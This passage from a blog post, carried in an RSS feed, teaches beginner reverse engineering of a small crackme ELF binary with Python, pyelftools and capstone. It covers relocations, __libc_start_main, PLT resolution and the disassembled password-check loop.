<span class="go">0x6b6: lea rcx, [rip + 0x1c3]</span>
<span class="go">0x6bd: lea rdi, [rip + 0xe6]</span>
<span class="go"><strong>0x6c4: call qword ptr [rip + 0x200916]</strong></span>
<span class="go">0x6ca: hlt</span>
<span class="go">... snip ...</span>
</code></pre></div>

<p>The line in bold is fairly interesting to us. The address <code>[rip + 0x200916]</code> is equivalent to <code>[0x6ca + 0x200916]</code> (<code>rip</code> holds the address of the <em>next</em> instruction), which in turn evaluates to <code>0x200fe0</code>. So the first <code>call</code> goes through the pointer stored at <code>0x200fe0</code>. What could this function be?</p>

<p>For this, we will have to look at <strong>relocations</strong>. Quoting <a href="http://refspecs.linuxbase.org/elf/gabi4+/ch4.reloc.html">linuxbase.org</a>:</p>

<blockquote>
 <p>Relocation is the process of connecting symbolic references with symbolic definitions. For example, when a program calls a function, the associated call instruction must transfer control to the proper destination address at execution. Relocatable files must have “relocation entries” which are necessary because they contain information that describes how to modify their section contents, thus allowing executable and shared object files to hold the right information for a process’s program image.</p>
</blockquote>

<p>To try and find these relocation entries, we write a third script.</p>

<div class="codehilite"><pre><span></span><code><span class="c1"># relocations.py</span>

<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">from</span> <span class="nn">elftools.elf.elffile</span> <span class="kn">import</span> <span class="n">ELFFile</span>
<span class="kn">from</span> <span class="nn">elftools.elf.relocation</span> <span class="kn">import</span> <span class="n">RelocationSection</span>

<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s1">'./chall.elf'</span><span class="p">,</span> <span class="s1">'rb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
    <span class="n">e</span> <span class="o">=</span> <span class="n">ELFFile</span><span class="p">(</span><span class="n">f</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">section</span> <span class="ow">in</span> <span class="n">e</span><span class="o">.</span><span class="n">iter_sections</span><span class="p">():</span>
        <span class="k">if</span> <span class="nb">isinstance</span><span class="p">(</span><span class="n">section</span><span class="p">,</span> <span class="n">RelocationSection</span><span class="p">):</span>
            <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s1">'</span><span class="si">{</span><span class="n">section</span><span class="o">.</span><span class="n">name</span><span class="si">}</span><span class="s1">:'</span><span class="p">)</span>
            <span class="n">symbol_table</span> <span class="o">=</span> <span class="n">e</span><span class="o">.</span><span class="n">get_section</span><span class="p">(</span><span class="n">section</span><span class="p">[</span><span class="s1">'sh_link'</span><span class="p">])</span>
            <span class="k">for</span> <span class="n">relocation</span> <span class="ow">in</span> <span class="n">section</span><span class="o">.</span><span class="n">iter_relocations</span><span class="p">():</span>
                <span class="n">symbol</span> <span class="o">=</span> <span class="n">symbol_table</span><span class="o">.</span><span class="n">get_symbol</span><span class="p">(</span><span class="n">relocation</span><span class="p">[</span><span class="s1">'r_info_sym'</span><span class="p">])</span>
                <span class="n">addr</span> <span class="o">=</span> <span class="nb">hex</span><span class="p">(</span><span class="n">relocation</span><span class="p">[</span><span class="s1">'r_offset'</span><span class="p">])</span>
                <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s1">'</span><span class="si">{</span><span class="n">symbol</span><span class="o">.</span><span class="n">name</span><span class="si">}</span><span class="s1"> </span><span class="si">{</span><span class="n">addr</span><span class="si">}</span><span class="s1">'</span><span class="p">)</span>
</code></pre></div>

<p>Let’s run through this code real quick. We first loop through the sections and check whether each one is a <code>RelocationSection</code>. For every one that is, we iterate through its relocations, looking each entry’s symbol up in the symbol table that section links to (<code>sh_link</code>). Finally, running this gives us:</p>

<div class="codehilite"><pre><span></span><code><span class="go">› python relocations.py</span>
<span class="go">.rela.dyn:</span>
<span class="go"> 0x200d98</span>
<span class="go"> 0x200da0</span>
<span class="go"> 0x201008</span>
<span class="go">_ITM_deregisterTMCloneTable 0x200fd8</span>
<span class="go"><strong>__libc_start_main 0x200fe0</strong></span>
<span class="go">__gmon_start__ 0x200fe8</span>
<span class="go">_ITM_registerTMCloneTable 0x200ff0</span>
<span class="go">__cxa_finalize 0x200ff8</span>
<span class="go">stdin 0x201010</span>
<span class="go">.rela.plt:</span>
<span class="go">puts 0x200fb0</span>
<span class="go">printf 0x200fb8</span>
<span class="go">fgets 0x200fc0</span>
<span class="go">strcmp 0x200fc8</span>
<span class="go">malloc 0x200fd0</span>
</code></pre></div>


<p>Remember the call through <code>0x200fe0</code> from earlier? Yep, so that was a call to the well-known <code>__libc_start_main</code>. Again, according to <a href="http://refspecs.linuxbase.org/LSB_3.1.0/LSB-generic/LSB-generic/baselib—libc-start-main-.html">linuxbase.org</a>:</p>

<blockquote>
 <p>The <code>__libc_start_main()</code> function shall perform any necessary initialization of the execution environment, call the <em>main</em> function with appropriate arguments, and handle the return from <code>main()</code>. If the <code>main()</code> function returns, the return value shall be passed to the <code>exit()</code> function.</p>
</blockquote>

<p>And its prototype is like so:</p>

<div class="codehilite"><pre><span></span><code><span class="kt">int</span> <span class="nf">__libc_start_main</span><span class="p">(</span><span class="kt">int</span> <span class="o">*</span><span class="p">(</span><span class="n">main</span><span class="p">)</span> <span class="p">(</span><span class="kt">int</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span> <span class="o">*</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span> <span class="o">*</span><span class="p">),</span>
    <span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span> <span class="o">*</span> <span class="n">ubp_av</span><span class="p">,</span>
    <span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">init</span><span class="p">)</span> <span class="p">(</span><span class="kt">void</span><span class="p">),</span>
    <span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">fini</span><span class="p">)</span> <span class="p">(</span><span class="kt">void</span><span class="p">),</span>
    <span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">rtld_fini</span><span class="p">)</span> <span class="p">(</span><span class="kt">void</span><span class="p">),</span>
    <span class="kt">void</span> <span class="p">(</span><span class="o">*</span> <span class="n">stack_end</span><span class="p">));</span>
</code></pre></div>


<p>Looking back at our disassembly,</p>

<pre><code>0x6a0: xor ebp, ebp
0x6a2: mov r9, rdx
0x6a5: pop rsi
0x6a6: mov rdx, rsp
0x6a9: and rsp, 0xfffffffffffffff0
0x6ad: push rax
0x6ae: push rsp
0x6af: lea r8, [rip + 0x23a]
0x6b6: lea rcx, [rip + 0x1c3]
<strong>0x6bd: lea rdi, [rip + 0xe6]</strong>
0x6c4: call qword ptr [rip + 0x200916]
0x6ca: hlt
... snip ...
</code></pre>


<p>this time, look at the <code>lea</code>, or Load Effective Address, instruction, which loads the address <code>[rip + 0xe6]</code> into the <code>rdi</code> register. <code>[rip + 0xe6]</code> evaluates to <code>0x7aa</code> (<code>0x6c4 + 0xe6</code>, with <code>rip</code> again pointing at the next instruction), which happens to be the address of our <code>main()</code> function! How do I know that? Because <code>rdi</code> carries the first argument on x86-64, the <code>main</code> parameter in the prototype above, and <code>__libc_start_main()</code>, after doing whatever it does, eventually transfers control to the function passed in <code>rdi</code>, which is generally the <code>main()</code> function. It looks something like this:</p>

<p><img src="https://cdn-images-1.medium.com/max/800/0*oQA2MwHjhzosF8ZH.png" alt="" /></p>

<p>To see the disassembly of <code>main</code>, seek to <code>0x7aa</code> in the output of the script we’d written earlier (<code>disas1.py</code>).</p>

<p>From what we discovered earlier, each <code>call</code> instruction points to some function, and the <code>.plt</code> stubs it lands on jump through the GOT slots we saw in the relocation entries. So following each <code>call</code> into its relocation gives us this:</p>

<pre><code>printf 0x650
fgets 0x660
strcmp 0x670
malloc 0x680
</code></pre>
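<p>The two lookups done by hand above (resolving the rip-relative <code>call</code> at <code>0x6c4</code> to its GOT slot and symbol, and mapping the direct <code>call 0x6xx</code> targets to the PLT stubs’ symbols) can be automated. The following is an added example and not code from the post: it consumes the same <code>(address, size, mnemonic, op_str)</code> tuples that capstone’s <code>md.disasm()</code> yields in <code>disas1.py</code> and the GOT-slot-to-symbol pairs that <code>relocations.py</code> prints, but so that it runs without the binary, the instruction lists and the <code>.plt</code> displacements below are constructed from the post’s own output.</p>

```python
import re
# rip-relative operand as capstone prints it, e.g. "qword ptr [rip + 0x200916]"
RIP_REL = re.compile(r"\[rip\s*([+-])\s*0x([0-9a-fA-F]+)\]")

def rip_relative_target(address, size, op_str):
    # rip holds the *next* instruction's address, so base = address + size
    # (the post's call at 0x6c4 is 6 bytes long, hence 0x6ca + 0x200916).
    m = RIP_REL.search(op_str)
    if m is None:
        return None
    disp = int(m.group(2), 16)
    return address + size + (-disp if m.group(1) == "-" else disp)

def map_plt_stubs(plt_insns, got_symbols):
    # A PLT stub starts with `jmp qword ptr [rip + X]`; the .rela.plt symbol
    # owning the GOT slot it lands on names the stub: stub address -> symbol.
    stubs = {}
    for addr, size, mnem, ops in plt_insns:
        slot = rip_relative_target(addr, size, ops) if mnem == "jmp" else None
        if slot in got_symbols:
            stubs[addr] = got_symbols[slot]
    return stubs

def resolve(insn, got_symbols, plt_stubs):
    # Symbol (or address) an instruction refers to; None if we cannot tell.
    addr, size, mnem, ops = insn
    if mnem in ("call", "jmp") and ops.startswith("0x"):  # direct call into .plt
        return plt_stubs.get(int(ops, 16))
    target = rip_relative_target(addr, size, ops)
    if mnem in ("call", "jmp"):                            # call through a GOT slot
        return got_symbols.get(target)
    return hex(target) if mnem == "lea" and target is not None else None

def annotate(insns, got_symbols, plt_stubs):
    # Same line format as disas1.py, plus a ';' comment where we resolved something.
    out = []
    for insn in insns:
        note = resolve(insn, got_symbols, plt_stubs)
        line = f"0x{insn[0]:x}:\t{insn[2]}\t{insn[3]}"
        out.append(line + (f"\t; {note}" if note else ""))
    return out

# Constructed from the post's relocations.py output: GOT slot -> symbol.
GOT_SYMBOLS = {0x200fb0: "puts", 0x200fb8: "printf", 0x200fc0: "fgets",
               0x200fc8: "strcmp", 0x200fd0: "malloc", 0x200fe0: "__libc_start_main"}
# Constructed .plt listing: stubs 16 bytes apart from 0x640, each a 6-byte jmp whose
# displacement lands on the next 8-byte slot above (0x646 + 0x20096a = 0x200fb0).
PLT_INSNS = [(0x640 + 16 * k, 6, "jmp", f"qword ptr [rip + {0x20096a - 8 * k:#x}]")
             for k in range(5)]
# Instructions taken from the post's disassembly of _start and main.
TEXT_INSNS = [(0x6bd, 7, "lea", "rdi, [rip + 0xe6]"),
              (0x6c4, 6, "call", "qword ptr [rip + 0x200916]"),
              (0x7b7, 5, "call", "0x680"), (0x851, 5, "call", "0x670")]
```

<p>Calling <code>annotate(TEXT_INSNS, GOT_SYMBOLS, map_plt_stubs(PLT_INSNS, GOT_SYMBOLS))</code> tags the <code>lea</code> with <code>0x7aa</code>, the GOT call with <code>__libc_start_main</code> and the two direct calls with <code>malloc</code> and <code>strcmp</code>; with a real binary, feed it the tuples from <code>disas1.py</code>’s loop (plus the <code>.plt</code> section disassembled the same way) and a dict built from the <code>r_offset</code>/name pairs <code>relocations.py</code> prints.</p>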

<p>Putting all this together, things start falling into place. Let me highlight the key sections of the disassembly here. It’s pretty self-explanatory.</p>

<pre><code>0x7b2: mov edi, 0xa ; 10
0x7b7: call 0x680 ; malloc
</code></pre>

<p>The loop to populate the <code>*pw</code> string:</p>

<pre><code>0x7d0: mov eax, dword ptr [rbp - 0x14]
0x7d3: cdqe
0x7d5: lea rdx, [rax - 1]
0x7d9: mov rax, qword ptr [rbp - 0x10]
0x7dd: add rax, rdx
0x7e0: movzx eax, byte ptr [rax]
0x7e3: lea ecx, [rax + 1]
0x7e6: mov eax, dword ptr [rbp - 0x14]
0x7e9: movsxd rdx, eax
0x7ec: mov rax, qword ptr [rbp - 0x10]
0x7f0: add rax, rdx
0x7f3: mov edx, ecx
0x7f5: mov byte ptr [rax], dl
0x7f7: add dword ptr [rbp - 0x14], 1
0x7fb: cmp dword ptr [rbp - 0x14], 8
0x7ff: jle 0x7d0
</code></pre>

<p>And this looks like our <code>strcmp()</code>:</p>

<pre><code>0x843: mov rdx, qword ptr [rbp - 0x10] ; *in
0x847: mov rax, qword ptr [rbp - 8] ; *pw
0x84b: mov rsi, rdx
0x84e: mov rdi, rax
0x851: call 0x670 ; strcmp
0x856: test eax, eax ; is = 0?
0x858: jne 0x868 ; no? jump to 0x868
0x85a: lea rdi, [rip + 0xae] ; "haha yes!"
0x861: call 0x640 ; puts
0x866: jmp 0x874
0x868: lea rdi, [rip + 0xaa] ; "nah dude"
0x86f: call 0x640 ; puts
</code></pre>

<p>I’m not sure why it uses <code>puts</code> here. I might be missing something; perhaps <code>printf</code> calls <code>puts</code>. I could be wrong. I also confirmed with radare2 that those locations are actually the strings “haha yes!” and “nah dude”.</p>

<p><strong>Update</strong>: It’s because of compiler optimization. A <code>printf()</code> (in this case) is seen as a bit overkill, and hence gets simplified to a <code>puts()</code>.</p>

<h2 id="conclusion">Conclusion</h2>

<p>Wew, that took quite some time. But we’re done. If you’re a beginner, you might find this extremely confusing, or might not have understood what was going on at all. And that’s okay. Building an intuition for reading and grokking disassembly comes with practice. I’m no good at it either.</p>

<p>All the code used in this post is here: <a href="https://github.com/icyphox/asdf/tree/master/reversing-elf">https://github.com/icyphox/asdf/tree/master/reversing-elf</a></p>

<p>Ciao for now, and I’ll see ya in #2 of this series—PE binaries. Whenever that is.</p>
]]></description><link>https://icyphox.sh/blog/python-for-re-1</link><pubDate>Fri, 08 Feb 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/python-for-re-1</guid></item></channel>
</rss>